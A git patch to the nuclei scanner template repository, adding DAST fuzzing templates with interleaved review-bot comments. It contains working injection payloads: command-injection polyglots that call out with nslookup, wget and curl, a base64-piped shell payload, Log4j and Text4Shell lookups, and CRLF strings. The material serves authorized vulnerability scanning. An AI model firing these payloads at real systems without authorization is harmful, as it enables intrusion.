From fc79bf96b70faf94ea4f261bcada6f4dccffa1d3 Mon Sep 17 00:00:00 2001 
From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 17 Mar 2024 00:14:49 +0530 Subject: [PATCH] Added fuzzing templates --- .nuclei-ignore | 4 +- config/bugbounty.yml | 2 +- config/pentest.yml | 2 +- config/recommended.yml | 2 +- .../{ => brute}/cache-poisoning-fuzz.yaml | 2 +- .../{ => brute}/header-command-injection.yaml | 2 +- http/fuzzing/{ => brute}/iis-shortname.yaml | 0 .../{ => brute}/linux-lfi-fuzzing.yaml | 2 +- .../{ => brute}/mdb-database-file.yaml | 0 .../{ => brute}/prestashop-module-fuzz.yaml | 4 +- http/fuzzing/{ => brute}/ssrf-via-proxy.yaml | 0 .../{ => brute}/valid-gmail-check.yaml | 2 +- http/fuzzing/{ => brute}/waf-fuzz.yaml | 3 +- .../{ => brute}/wordpress-plugins-detect.yaml | 3 +- .../{ => brute}/wordpress-themes-detect.yaml | 3 +- .../wordpress-weak-credentials.yaml | 2 +- http/fuzzing/{ => brute}/xff-403-bypass.yaml | 2 +- .../dast/cmdi/blind-oast-polyglots.yaml | 46 ++ .../dast/cmdi/cves/CVE-2018-19518.yaml | 41 ++ .../dast/cmdi/cves/CVE-2021-45046.yaml | 60 +++ .../dast/cmdi/cves/CVE-2022-42889.yaml | 65 +++ http/fuzzing/dast/cmdi/ruby-open-rce.yaml | 36 ++ http/fuzzing/dast/crlf/cookie-injection.yaml | 34 ++ http/fuzzing/dast/crlf/crlf-injection.yaml | 69 +++ ...ngular-client-side-template-injection.yaml | 39 ++ http/fuzzing/dast/lfi/lfi-keyed.yaml | 118 +++++ http/fuzzing/dast/lfi/linux-lfi-fuzz.yaml | 78 +++ http/fuzzing/dast/lfi/windows-lfi-fuzz.yaml | 71 +++ http/fuzzing/dast/redirect/open-redirect.yaml | 180 +++++++ http/fuzzing/dast/rfi/rfi.yaml | 31 ++ .../dast/sqli/cves/CVE-2022-34265.yaml | 45 ++ http/fuzzing/dast/sqli/error-based.yaml | 492 ++++++++++++++++++ http/fuzzing/dast/ssrf/blind-ssrf.yaml | 40 ++ http/fuzzing/dast/ssrf/response-ssrf.yaml | 127 +++++ http/fuzzing/dast/ssti/reflection-ssti.yaml | 51 ++ http/fuzzing/dast/xss/dom-xss.yaml | 45 ++ http/fuzzing/dast/xss/reflected-xss.yaml | 39 ++ http/fuzzing/dast/xxe/fuzz-xxe.yaml | 50 ++ http/vulnerabilities/generic/xss-fuzz.yaml | 87 ++-- 39 files 
changed, 1817 insertions(+), 62 deletions(-) rename http/fuzzing/{ => brute}/cache-poisoning-fuzz.yaml (96%) rename http/fuzzing/{ => brute}/header-command-injection.yaml (97%) rename http/fuzzing/{ => brute}/iis-shortname.yaml (100%) rename http/fuzzing/{ => brute}/linux-lfi-fuzzing.yaml (99%) rename http/fuzzing/{ => brute}/mdb-database-file.yaml (100%) rename http/fuzzing/{ => brute}/prestashop-module-fuzz.yaml (89%) rename http/fuzzing/{ => brute}/ssrf-via-proxy.yaml (100%) rename http/fuzzing/{ => brute}/valid-gmail-check.yaml (95%) rename http/fuzzing/{ => brute}/waf-fuzz.yaml (99%) rename http/fuzzing/{ => brute}/wordpress-plugins-detect.yaml (94%) rename http/fuzzing/{ => brute}/wordpress-themes-detect.yaml (84%) rename http/fuzzing/{ => brute}/wordpress-weak-credentials.yaml (99%) rename http/fuzzing/{ => brute}/xff-403-bypass.yaml (97%) create mode 100644 http/fuzzing/dast/cmdi/blind-oast-polyglots.yaml create mode 100644 http/fuzzing/dast/cmdi/cves/CVE-2018-19518.yaml create mode 100644 http/fuzzing/dast/cmdi/cves/CVE-2021-45046.yaml create mode 100644 http/fuzzing/dast/cmdi/cves/CVE-2022-42889.yaml create mode 100644 http/fuzzing/dast/cmdi/ruby-open-rce.yaml create mode 100644 http/fuzzing/dast/crlf/cookie-injection.yaml create mode 100644 http/fuzzing/dast/crlf/crlf-injection.yaml create mode 100644 http/fuzzing/dast/csti/angular-client-side-template-injection.yaml create mode 100644 http/fuzzing/dast/lfi/lfi-keyed.yaml create mode 100644 http/fuzzing/dast/lfi/linux-lfi-fuzz.yaml create mode 100644 http/fuzzing/dast/lfi/windows-lfi-fuzz.yaml create mode 100644 http/fuzzing/dast/redirect/open-redirect.yaml create mode 100644 http/fuzzing/dast/rfi/rfi.yaml create mode 100644 http/fuzzing/dast/sqli/cves/CVE-2022-34265.yaml create mode 100644 http/fuzzing/dast/sqli/error-based.yaml create mode 100644 http/fuzzing/dast/ssrf/blind-ssrf.yaml create mode 100644 http/fuzzing/dast/ssrf/response-ssrf.yaml create mode 100644 
http/fuzzing/dast/ssti/reflection-ssti.yaml create mode 100644 http/fuzzing/dast/xss/dom-xss.yaml create mode 100644 http/fuzzing/dast/xss/reflected-xss.yaml create mode 100644 http/fuzzing/dast/xxe/fuzz-xxe.yaml diff --git a/.nuclei-ignore b/.nuclei-ignore index 4714e3b0df..760f8543d0 100644 --- a/.nuclei-ignore +++ b/.nuclei-ignore @@ -2,7 +2,7 @@ # ==================================== # # This is default list of tags and files to excluded from default nuclei scan. -# More details - https://nuclei.projectdiscovery.io/nuclei/get-started/#template-exclusion +# More details - https://docs.projectdiscovery.io/tools/nuclei/running#template-exclusion # # ============ DO NOT EDIT ============ # Automatically updated by nuclei on execution from nuclei-templates @@ -13,10 +13,8 @@ # unless asked for by the user. tags: - - "fuzz" - "dos" - "local" - - "brute-force" - "bruteforce" - "phishing" diff --git a/config/bugbounty.yml b/config/bugbounty.yml index b75b98dc83..5100e5a49f 100644 --- a/config/bugbounty.yml +++ b/config/bugbounty.yml @@ -20,7 +20,7 @@ type: exclude-tags: - tech - dos - - brute-force + - bruteforce - creds-stuffing - token-spray - osint \ No newline at end of file diff --git a/config/pentest.yml b/config/pentest.yml index dc2466e291..d99c2d14c8 100644 --- a/config/pentest.yml +++ b/config/pentest.yml @@ -15,5 +15,5 @@ type: exclude-tags: - dos - - brute-force + - bruteforce - osint \ No newline at end of file diff --git a/config/recommended.yml b/config/recommended.yml index c3b24db1a9..6cfb5778da 100644 --- a/config/recommended.yml +++ b/config/recommended.yml @@ -20,7 +20,7 @@ type: exclude-tags: - tech - dos - - brute-force + - bruteforce - creds-stuffing - token-spray - osint diff --git a/http/fuzzing/cache-poisoning-fuzz.yaml b/http/fuzzing/brute/cache-poisoning-fuzz.yaml similarity index 96% rename from http/fuzzing/cache-poisoning-fuzz.yaml rename to http/fuzzing/brute/cache-poisoning-fuzz.yaml index f76d291382..74037ce125 100644 
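Review bot: Dropping `"fuzz"` from the default exclusion list in the second `.nuclei-ignore` hunk means every template in this commit tagged `fuzz` (all of `http/fuzzing/dast/*`) is no longer held back by this file, and nothing in the file says what keeps them out of a plain scan. If the intent is that fuzzing templates only execute when the engine is run in its DAST mode, record that next to the list, e.g. `# "fuzz" is deliberately not excluded: fuzzing templates are only executed when the engine runs in DAST mode`, so the next person editing this list does not re-add it or assume a leak. The `brute-force` → `bruteforce` change in the three `config/*.yml` files matches the tag the templates actually carry, so that part reads as a bug fix rather than a rename.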
--- a/http/fuzzing/cache-poisoning-fuzz.yaml +++ b/http/fuzzing/brute/cache-poisoning-fuzz.yaml @@ -9,7 +9,7 @@ info: - https://portswigger.net/web-security/web-cache-poisoning metadata: max-request: 5834 - tags: fuzzing,bruteforce,cache + tags: bruteforce,cache http: - raw: diff --git a/http/fuzzing/header-command-injection.yaml b/http/fuzzing/brute/header-command-injection.yaml similarity index 97% rename from http/fuzzing/header-command-injection.yaml rename to http/fuzzing/brute/header-command-injection.yaml index 550e7fbc9a..ab964c4821 100644 --- a/http/fuzzing/header-command-injection.yaml +++ b/http/fuzzing/brute/header-command-injection.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-77 metadata: max-request: 7650 - tags: fuzzing,bruteforce,rce + tags: bruteforce,rce http: - raw: diff --git a/http/fuzzing/iis-shortname.yaml b/http/fuzzing/brute/iis-shortname.yaml similarity index 100% rename from http/fuzzing/iis-shortname.yaml rename to http/fuzzing/brute/iis-shortname.yaml diff --git a/http/fuzzing/linux-lfi-fuzzing.yaml b/http/fuzzing/brute/linux-lfi-fuzzing.yaml similarity index 99% rename from http/fuzzing/linux-lfi-fuzzing.yaml rename to http/fuzzing/brute/linux-lfi-fuzzing.yaml index f313bfc151..163784b684 100644 --- a/http/fuzzing/linux-lfi-fuzzing.yaml +++ b/http/fuzzing/brute/linux-lfi-fuzzing.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 22 - tags: fuzzing,linux,lfi,bruteforce + tags: linux,lfi,bruteforce http: - method: GET diff --git a/http/fuzzing/mdb-database-file.yaml b/http/fuzzing/brute/mdb-database-file.yaml similarity index 100% rename from http/fuzzing/mdb-database-file.yaml rename to http/fuzzing/brute/mdb-database-file.yaml diff --git a/http/fuzzing/prestashop-module-fuzz.yaml b/http/fuzzing/brute/prestashop-module-fuzz.yaml similarity index 89% rename from http/fuzzing/prestashop-module-fuzz.yaml rename to http/fuzzing/brute/prestashop-module-fuzz.yaml index d280c39b77..ba3a105064 100644 
--- a/http/fuzzing/prestashop-module-fuzz.yaml +++ b/http/fuzzing/brute/prestashop-module-fuzz.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 639 - tags: fuzzing,bruteforce,prestashop + tags: bruteforce,prestashop http: - raw: @@ -20,8 +20,6 @@ http: payloads: path: helpers/wordlists/prestashop-modules.txt - threads: 50 - matchers-condition: and matchers: - type: word diff --git a/http/fuzzing/ssrf-via-proxy.yaml b/http/fuzzing/brute/ssrf-via-proxy.yaml similarity index 100% rename from http/fuzzing/ssrf-via-proxy.yaml rename to http/fuzzing/brute/ssrf-via-proxy.yaml diff --git a/http/fuzzing/valid-gmail-check.yaml b/http/fuzzing/brute/valid-gmail-check.yaml similarity index 95% rename from http/fuzzing/valid-gmail-check.yaml rename to http/fuzzing/brute/valid-gmail-check.yaml index 6d3a9fd0d6..cf50fbfbba 100644 --- a/http/fuzzing/valid-gmail-check.yaml +++ b/http/fuzzing/brute/valid-gmail-check.yaml @@ -8,7 +8,7 @@ info: - https://github.com/dievus/geeMailUserFinder metadata: max-request: 1 - tags: bruteforce,gmail + tags: gmail self-contained: true diff --git a/http/fuzzing/waf-fuzz.yaml b/http/fuzzing/brute/waf-fuzz.yaml similarity index 99% rename from http/fuzzing/waf-fuzz.yaml rename to http/fuzzing/brute/waf-fuzz.yaml index 392aa4cad0..d5e2ea23bf 100644 --- a/http/fuzzing/waf-fuzz.yaml +++ b/http/fuzzing/brute/waf-fuzz.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 58 - tags: fuzzing,waf,tech,bruteforce + tags: waf,bruteforce http: - raw: @@ -56,6 +56,7 @@ http: - SELECT * FROM information_schema.tables - SELECT user FROM information_schema.tables AND user = \'test user\'; - UNION SELECT * FROM users WHERE user = \'admin\'; + stop-at-first-match: true matchers: - type: regex 
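Review bot: Removing `matchers-condition: and` from `prestashop-module-fuzz.yaml` (second hunk) silently switches to the default `or` if more than one matcher remains under `matchers:`, which the hunk cuts off right after `- type: word`; a word-only match on a wordlist-driven probe would then fire on any generic 200 page. If a second matcher (a status check, say) is still there, keep `matchers-condition: and`; if only one matcher remains the removal is fine but deserves a mention in the commit message. The `matchers:` block continues outside the hunk.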
diff --git a/http/fuzzing/wordpress-plugins-detect.yaml b/http/fuzzing/brute/wordpress-plugins-detect.yaml similarity index 94% rename from http/fuzzing/wordpress-plugins-detect.yaml rename to http/fuzzing/brute/wordpress-plugins-detect.yaml index ac4f0ded77..ddd8185157 100644 --- a/http/fuzzing/wordpress-plugins-detect.yaml +++ b/http/fuzzing/brute/wordpress-plugins-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 100563 - tags: fuzzing,bruteforce,wordpress + tags: bruteforce,wordpress http: - raw: @@ -14,7 +14,6 @@ http: GET /wp-content/plugins/{{pluginSlug}}/readme.txt HTTP/1.1 Host: {{Hostname}} - threads: 50 payloads: pluginSlug: helpers/wordlists/wordpress-plugins.txt diff --git a/http/fuzzing/wordpress-themes-detect.yaml b/http/fuzzing/brute/wordpress-themes-detect.yaml similarity index 84% rename from http/fuzzing/wordpress-themes-detect.yaml rename to http/fuzzing/brute/wordpress-themes-detect.yaml index 3bb2f31ff5..ece60cfda8 100644 --- a/http/fuzzing/wordpress-themes-detect.yaml +++ b/http/fuzzing/brute/wordpress-themes-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 24434 - tags: bruteforce,wordpress,wp + tags: bruteforce,wordpress http: - raw: @@ -16,7 +16,6 @@ http: payloads: themeSlug: helpers/wordlists/wordpress-themes.txt - threads: 50 matchers-condition: and matchers: diff --git a/http/fuzzing/wordpress-weak-credentials.yaml b/http/fuzzing/brute/wordpress-weak-credentials.yaml similarity index 99% rename from http/fuzzing/wordpress-weak-credentials.yaml rename to http/fuzzing/brute/wordpress-weak-credentials.yaml index 55bff6004d..3321679286 100644 --- a/http/fuzzing/wordpress-weak-credentials.yaml +++ b/http/fuzzing/brute/wordpress-weak-credentials.yaml @@ -27,10 +27,10 @@ http: log={{users}}&pwd={{passwords}} + attack: clusterbomb payloads: users: helpers/wordlists/wp-users.txt passwords: helpers/wordlists/wp-passwords.txt - attack: clusterbomb stop-at-first-match: true matchers-condition: and 
diff --git a/http/fuzzing/xff-403-bypass.yaml b/http/fuzzing/brute/xff-403-bypass.yaml similarity index 97% rename from http/fuzzing/xff-403-bypass.yaml rename to http/fuzzing/brute/xff-403-bypass.yaml index 564e32ff7e..7396b0baf2 100644 --- a/http/fuzzing/xff-403-bypass.yaml +++ b/http/fuzzing/brute/xff-403-bypass.yaml @@ -7,7 +7,7 @@ info: description: Template to detect 403 forbidden endpoint bypass behind Nginx/Apache proxy & load balancers, based on X-Forwarded-For header. metadata: max-request: 3 - tags: fuzzing,bruteforce + tags: bruteforce http: - raw: diff --git a/http/fuzzing/dast/cmdi/blind-oast-polyglots.yaml b/http/fuzzing/dast/cmdi/blind-oast-polyglots.yaml new file mode 100644 index 0000000000..050a7d7450 --- /dev/null +++ b/http/fuzzing/dast/cmdi/blind-oast-polyglots.yaml 
@@ -0,0 +1,46 @@
+id: cmdi-blind-oast-polyglot
+
+info:
+ name: Blind OS Command Injection
+ author: pdteam,geeknik
+ severity: high
+ description: |
+ Potential blind OS command injection vulnerabilities, where the application constructs OS commands using unsanitized user input.
+ Successful exploitation could lead to arbitrary command execution on the system.
+ reference:
+ - https://portswigger.net/research/hunting-asynchronous-vulnerabilities
+ - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Command%20Injection/README.md
+ tags: cmdi,oast,dast,blind,polyglot,fuzz
+
+variables:
+ marker: "{{interactsh-url}}"
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ payloads:
+ interaction:
+ - "&nslookup {{marker}}&'\\\"`0&nslookup {{marker}}&`'"
+ - "1;nslookup${IFS}{{marker}};#${IFS}';nslookup${IFS}{{marker}};#${IFS}\";nslookup${IFS}{{marker}};#${IFS}"
+ - "/*$(nslookup {{marker}})`nslookup {{marker}}``*/-nslookup({{marker}})-'/*$(nslookup {{marker}})`nslookup {{marker}}` #*/-nslookup({{marker}})||'\"||nslookup({{marker}})||\"/*`*/"
+ - "$(ping -c 1 {{marker}} | nslookup {{marker}} ; wget {{marker}} -O /dev/null)"
+
+ fuzzing:
+ - part: query
+ type: postfix
+ fuzz:
+ - "{{interaction}}"
+
+ stop-at-first-match: true
+ matchers:
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "dns"
+
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "http"
diff --git a/http/fuzzing/dast/cmdi/cves/CVE-2018-19518.yaml b/http/fuzzing/dast/cmdi/cves/CVE-2018-19518.yaml
new file mode 100644
index 0000000000..81033b7014
--- /dev/null
+++ b/http/fuzzing/dast/cmdi/cves/CVE-2018-19518.yaml
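Review bot: The two `interactsh_protocol` matchers are OR'd (no `matchers-condition`), so a bare DNS lookup of the marker is enough to report this at `severity: high`; DNS callbacks are also produced by proxies, security appliances and resolvers that pre-resolve hostname-looking strings, so a `dns`-only hit is much weaker evidence than an `http` one. Suggest recording that in `info.metadata` (the CVE templates in this commit use a `confidence` key for exactly this) or in the description, e.g. `# a DNS-only interaction can be caused by intermediaries; treat it as lower confidence than an HTTP callback`, so consumers can triage DNS-only results accordingly.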
@@ -0,0 +1,41 @@
+id: CVE-2018-19518
+
+info:
+ name: PHP imap - Remote Command Execution
+ author: princechaddha
+ severity: high
+ description: |
+ University of Washington IMAP Toolkit 2007f on UNIX, as used in imap_open() in PHP and other products, launches an rsh command (by means of the imap_rimap function in c-client/imap4r1.c and the tcp_aopen function in osdep/unix/tcp_unix.c) without preventing argument injection, which might allow remote attackers to execute arbitrary OS commands if the IMAP server name is untrusted input (e.g., entered by a user of a web application) and if rsh has been replaced by a program with different argument semantics. For example, if rsh is a link to ssh (as seen on Debian and Ubuntu systems), then the attack can use an IMAP server name containing a "-oProxyCommand" argument.
+ reference:
+ - https://github.com/vulhub/vulhub/tree/master/php/CVE-2018-19518
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-19518
+ - https://www.openwall.com/lists/oss-security/2018/11/22/3
+ - https://github.com/Bo0oM/PHP_imap_open_exploit/blob/master/exploit.php
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.5
+ cve-id: CVE-2018-19518
+ cwe-id: CWE-88
+ metadata:
+ confidence: tenative
+ tags: imap,dast,vulhub,cve,cve2018,rce,oast,php,fuzz
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ payloads:
+ php-imap:
+ - "x -oProxyCommand=echo {{base64(url_encode('nslookup {{interactsh-url}}'))}}|base64 -d|sh}"
+
+ fuzzing:
+ - part: query
+ fuzz:
+ - "{{php-imap}}"
+
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the DNS Interaction
+ words:
+ - "dns"
diff --git a/http/fuzzing/dast/cmdi/cves/CVE-2021-45046.yaml b/http/fuzzing/dast/cmdi/cves/CVE-2021-45046.yaml
new file mode 100644
index 0000000000..72b25a4b71
--- /dev/null
+++ b/http/fuzzing/dast/cmdi/cves/CVE-2021-45046.yaml
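Review bot: `confidence: tenative` under `info.metadata` is misspelled and should read `confidence: tentative`; the same typo is in the CVE-2021-45046 and CVE-2022-42889 templates of this commit, and a misspelled value defeats any tooling that filters on it. Separately, the single `php-imap` payload is not obviously equivalent to the PoC cited under `reference` (the referenced exploit separates the arguments of the injected option differently and does not URL-encode the inner command before base64), so please confirm against the vulhub environment listed there that the template really produces the DNS interaction it matches on; otherwise it will silently report nothing on vulnerable hosts.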
@@ -0,0 +1,60 @@
+id: CVE-2021-45046
+
+info:
+ name: Apache Log4j2 - Remote Code Injection
+ author: princechaddha
+ severity: critical
+ description: Apache Log4j2 Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations.
+ reference:
+ - https://securitylab.github.com/advisories/GHSL-2021-1054_GHSL-2021-1055_log4j2/
+ - https://twitter.com/marcioalm/status/1471740771581652995
+ - https://logging.apache.org/log4j/2.x/
+ - http://www.openwall.com/lists/oss-security/2021/12/14/4
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 9
+ cve-id: CVE-2021-45046
+ cwe-id: CWE-502
+ metadata:
+ confidence: tenative
+ tags: cve,cve2021,rce,oast,log4j,injection,dast,fuzz
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ payloads:
+ log4j:
+ - "${jndi:ldap://127.0.0.1#.${hostName}.{{interactsh-url}}}"
+
+ fuzzing:
+ - part: query
+ fuzz:
+ - "{{log4j}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the DNS Interaction
+ words:
+ - "dns"
+
+ - type: regex
+ part: interactsh_request
+ regex:
+ - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
+
+ extractors:
+ - type: regex
+ part: interactsh_request
+ group: 2
+ regex:
+ - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
+
+ - type: regex
+ part: interactsh_request
+ group: 1
+ regex:
+ - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
diff --git a/http/fuzzing/dast/cmdi/cves/CVE-2022-42889.yaml b/http/fuzzing/dast/cmdi/cves/CVE-2022-42889.yaml
new file mode 100644
index 0000000000..b88ccb9305
--- /dev/null
+++ b/http/fuzzing/dast/cmdi/cves/CVE-2022-42889.yaml
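Review bot: The NVD link under `info.reference` is `https://nvd.nist.gov/vuln/detail/CVE-2021-44228`, the original Log4Shell entry, while this template's `cve-id` is CVE-2021-45046; it should be `- https://nvd.nist.gov/vuln/detail/CVE-2021-45046` so the references and the classification block agree. The three regexes under `matchers` and `extractors` are identical, and the inline comment on the matcher says "Print extracted ${hostName} in output" although a matcher prints nothing; that comment should say what it checks (that the callback hostname has the expected dotted label structure), and the two extractor comments should each name which capture group they expose rather than repeating the matcher's wording.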
@@ -0,0 +1,65 @@
+id: CVE-2022-42889
+
+info:
+ name: Text4Shell - Remote Code Execution
+ author: mordavid,princechaddha
+ severity: critical
+ description: |
+ Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - "script" - execute expressions using the JVM script execution engine (javax.script) - "dns" - resolve dns records - "url" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Text 1.10.0, which disables the problematic interpolators by default.
+ reference:
+ - https://lists.apache.org/thread/n2bd4vdsgkqh2tm14l1wyc3jyol7s1om
+ - http://www.openwall.com/lists/oss-security/2022/10/13/4
+ - http://www.openwall.com/lists/oss-security/2022/10/18/1
+ - https://securitylab.github.com/advisories/GHSL-2022-018_Apache_Commons_Text/
+ - https://github.com/silentsignal/burp-text4shell
+ remediation: Upgrade to Apache Commons Text component between 1.5.0 to 1.10.0.
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-42889
+ cwe-id: CWE-94
+ metadata:
+ confidence: tenative
+ tags: cve,cve2022,rce,oast,text4shell,dast,fuzz
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ payloads:
+ text4shell:
+ - "${url:UTF-8:https://{{Hostname}}.q.{{interactsh-url}}}"
+
+ fuzzing:
+ - part: query
+ fuzz:
+ - "{{text4shell}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the DNS Interaction
+ words:
+ - "dns"
+
+ - type: regex
+ part: interactsh_request
+ regex:
+ - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
+
+ extractors:
+ - type: kval
+ kval:
+ - interactsh_ip # Print remote interaction IP in output
+
+ - type: regex
+ part: interactsh_request
+ group: 2
+ regex:
+ - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
+
+ - type: regex
+ part: interactsh_request
+ group: 1
+ regex:
diff --git a/http/fuzzing/dast/cmdi/ruby-open-rce.yaml b/http/fuzzing/dast/cmdi/ruby-open-rce.yaml
new file mode 100644
index 0000000000..ef55b0cece
--- /dev/null
+++ b/http/fuzzing/dast/cmdi/ruby-open-rce.yaml
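Review bot: `remediation: Upgrade to Apache Commons Text component between 1.5.0 to 1.10.0.` describes the affected range rather than the fix; the description on the same template says 1.10.0 is the version that disables the interpolators, so it should read `remediation: Upgrade Apache Commons Text to 1.10.0 or later.` The third `extractors` entry ends at `regex:` with no pattern visible on this page; if that is not a rendering artifact the template will fail to load, so please check the file as committed. The hunk's first lines, including the `info` block this note refers to, are above this page line.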
@@ -0,0 +1,36 @@
+id: cmdi-ruby-open-rce
+
+info:
+ name: Ruby Kernel#open/URI.open RCE
+ author: pdteam
+ severity: high
+ description: |
+ Ruby's Kernel#open and URI.open enables not only file access but also process invocation by prefixing a pipe symbol (e.g., open(“| ls”)). So, it may lead to Remote Code Execution by using variable input to the argument of Kernel#open and URI.open.
+ reference:
+ - https://bishopfox.com/blog/ruby-vulnerabilities-exploits
+ - https://codeql.github.com/codeql-query-help/ruby/rb-kernel-open/
+ tags: cmdi,oast,dast,blind,ruby,rce,fuzz
+
+variables:
+ marker: "{{interactsh-url}}"
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ stop-at-first-match: true
+ payloads:
+ interaction:
+ - "|nslookup {{marker}}|curl {{marker}}"
+
+ fuzzing:
+ - part: query
+ fuzz:
+ - "{{interaction}}"
+
+ matchers:
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "dns"
diff --git a/http/fuzzing/dast/crlf/cookie-injection.yaml b/http/fuzzing/dast/crlf/cookie-injection.yaml
new file mode 100644
index 0000000000..96d4b28bf6
--- /dev/null
+++ b/http/fuzzing/dast/crlf/cookie-injection.yaml
@@ -0,0 +1,34 @@
+id: cookie-injection
+
+info:
+ name: Parameter based cookie injection
+ author: pdteam
+ severity: info
+ reference:
+ - https://www.invicti.com/blog/web-security/understanding-cookie-poisoning-attacks/
+ - https://docs.imperva.com/bundle/on-premises-knowledgebase-reference-guide/page/cookie_injection.htm
+ tags: reflected,dast,cookie,injection,fuzz
+
+variables:
+ first: "cookie_injection"
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ payloads:
+ reflection:
+ - "{{first}}"
+
+ fuzzing:
+ - part: query
+ type: postfix
+ fuzz:
+ - "{{reflection}}"
+
+ matchers:
+ - type: regex
+ part: header
+ regex:
+ - '(?m)(?i)(^set-cookie.*cookie_injection.*)'
diff --git a/http/fuzzing/dast/crlf/crlf-injection.yaml b/http/fuzzing/dast/crlf/crlf-injection.yaml
new file mode 100644
index 0000000000..d51916027c
--- /dev/null
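Review bot: `cookie-injection.yaml` has no `description` under `info`, unlike every other new template in this commit, so a consumer seeing an `info`-severity hit gets no explanation of what a query value echoed into `Set-Cookie` implies or how to fix it. Suggest a description along the lines of `description: A query parameter value is reflected into a Set-Cookie response header, so a crafted link can set or overwrite cookies for the victim (cookie injection / session fixation); cookie values should not be derived from request parameters.` The regex `(?m)(?i)(^set-cookie.*cookie_injection.*)` would also benefit from a one-line comment noting it is applied to the whole `header` part, which is why the multi-line flag is needed.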
+++ b/http/fuzzing/dast/crlf/crlf-injection.yaml
@@ -0,0 +1,69 @@
+id: crlf-injection
+
+info:
+ name: CRLF Injection
+ author: pdteam
+ severity: low
+ tags: crlf,dast,fuzz
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ payloads:
+ escape:
+ - "%00"
+ - "%0a"
+ - "%0a%20"
+ - "%0d"
+ - "%0d%09"
+ - "%0d%0a"
+ - "%0d%0a%09"
+ - "%0d%0a%20"
+ - "%0d%20"
+ - "%20"
+ - "%20%0a"
+ - "%20%0d"
+ - "%20%0d%0a"
+ - "%23%0a"
+ - "%23%0a%20"
+ - "%23%0d"
+ - "%23%0d%0a"
+ - "%23%oa"
+ - "%25%30"
+ - "%25%30%61"
+ - "%2e%2e%2f%0d%0a"
+ - "%2f%2e%2e%0d%0a"
+ - "%2f..%0d%0a"
+ - "%3f"
+ - "%3f%0a"
+ - "%3f%0d"
+ - "%3f%0d%0a"
+ - "%e5%98%8a%e5%98%8d"
+ - "%e5%98%8a%e5%98%8d%0a"
+ - "%e5%98%8a%e5%98%8d%0d"
+ - "%e5%98%8a%e5%98%8d%0d%0a"
+ - "%e5%98%8a%e5%98%8d%e5%98%8a%e5%98%8d"
+ - "%u0000"
+ - "%u000a"
+ - "%u000d"
+ - "\r"
+ - "\r%20"
+ - "\r\n"
+ - "\r\n%20"
+ - "\r\n\t"
+ - "\r\t"
+
+ fuzzing:
+ - part: query
+ type: postfix
+ fuzz:
+ - "{{escape}}Set-Cookie:crlfinjection=crlfinjection"
+
+ stop-at-first-match: true
+ matchers:
+ - type: regex
+ part: header
+ regex:
+ - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)'
diff --git a/http/fuzzing/dast/csti/angular-client-side-template-injection.yaml b/http/fuzzing/dast/csti/angular-client-side-template-injection.yaml
new file mode 100644
index 0000000000..d0ed3ea568
--- /dev/null
+++ b/http/fuzzing/dast/csti/angular-client-side-template-injection.yaml
